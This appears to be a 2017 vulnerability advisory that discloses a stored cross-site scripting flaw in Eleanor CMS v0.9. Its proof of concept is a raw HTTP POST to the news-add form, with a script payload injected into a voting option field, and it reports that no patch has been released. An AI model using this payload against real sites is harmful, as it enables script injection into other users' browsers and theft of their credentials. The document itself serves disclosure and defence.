=============================================
ICG Laboratory
- Discovered By : 0x3a
- Date : August 21, 2017
- Discovered by: 0x3a
- HomePage : Www.Iran-Cyber.net
- Vendor HomePage : Www.eleanor-cms.ru
=============================================
I. VULNERABILITY
-------------------------
Eleanor CMS v0.9 - Stored Cross Site Scripting
II. BACKGROUND
-------------------------
Consume significantly less resources than DLE, WordPress or Joomla
CNC with support for Russian text.
Thoughtful multilanguage will create a site in different languages
A flexible system of templates can give the will of design fantasy
Completely commented source code will greatly simplify familiarity with the system
III. DESCRIPTION
-------------------------
Has been detected a Stored XSS vulnerability in Eleanor CMS, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
Create A User And Login With It , In News Click On Add News , In Voting Section Add A Voting
Hacker Can Execute Any HTML/script .
And post:
POST Eleanor/news/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/Eleanor/news/add
Cookie: eluser=MTkwZmJjODQ4YmQwZjZmYmJjMWY3YTIwMWYyM2FhZWZ8Mg%3D%3D; el1-6=1; el1-4=1; elUploader-=599db3805df29
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 452
HTTP/1.1 200 OK
Date: Wed, 23 Aug 2017 17:09:03 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15
X-Powered-By: PHP/5.6.15
Cache-Control: no-store
Content-Language: en
Content-Encoding: gzip
X-Powered-CMS: Eleanor CMS http://eleanor-cms.ru
Content-Length: 3544
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
title=Pentest&uri=&tags=&announcement=Pentest&text=Pentest&show_detail=1&enddate=&status=1&voting%5B_addvoting%5D=1&voting%5Bbegin%5D=&voting%5Bend%5D=&voting%5Bagaindays%5D=10&voting%5B_questions%5D%5B0%5D%5Btitle%5D=Pentest&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B0%5D=1&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D=<script>alert("Stored XSS By 0x3a | ICG Labrotary")&voting%5B_questions%5D%5B0%5D%5Bmaxans%5D=2&back=http%3A%2F%2F127.0.0.1%2Fnews%2Fdelete%2F9&_draft=0
voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D Is Not Filtered That Make Store XSS.
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.
VI. SYSTEMS AFFECTED
-------------------------
Eleanor CMS v0.9
VII. SOLUTION
-------------------------
No Patch Released
VIII. CREDITS
-------------------------
This vulnerability has been discovered and reported
by ICG Laboratory
IX. About Me
-------------------------
0x3a | tlg : @CloudLinux